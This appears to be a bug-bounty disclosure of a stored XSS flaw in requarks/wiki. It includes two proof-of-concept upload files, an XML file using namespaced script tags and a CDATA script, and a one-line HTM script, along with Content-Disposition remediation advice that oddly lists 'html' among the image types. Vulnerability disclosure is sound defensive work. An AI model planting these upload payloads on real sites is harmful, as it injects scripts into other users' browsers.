Cross-site Scripting (XSS) - Stored in requarks/wiki
Reported on
Dec 20th 2021
Description
Stored XSS can be performed by malicious XML / HTM files. There is no check in place to prevent such files from being uploaded.
Proof of Concept 1 (XML)
1: Upload the following file as payload.xml:
<html>
<head></head>
<body>
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(2)</a:script>
<info>
<name>
<value><![CDATA[<script>confirm(document.domain)</script>]]></value>
</name>
<description>
<value>Hello</value>
</description>
<url>
<value>http://google.com</value>
</url>
</info>
</body>
</html>
Proof of Concept 2 (HTM)
2: Upload the following file as payload.htm:
<script>alert(1)</script>
Impact
This vulnerability allows stored XSS via uploaded XML / HTM files: the uploaded file is served back from the wiki and rendered by the browser, so the script it contains executes.
Recommended Fix
Only allow image file uploads (png / html / webp / svg [sanitize this one properly!]).
If restricting file types is not an option, I strongly suggest the Content-Disposition approach, since there are many dangerous file types that can be uploaded. I recommend:
For selected files (.png, .jpg, .svg (after sanitization), .pdf, .gif, etc.):
Use the Content-Disposition: inline header so that they can be viewed in the browser.
If the file extension does not match a safe file type:
Use the Content-Disposition: attachment header so that they are downloaded to the user's computer instead of being rendered.
Occurrences
assets.js L163-L220
Alternative Fix: Serve Content-Disposition: "inline" for selected file types deemed safe and Content-Disposition: "attachment" for the rest.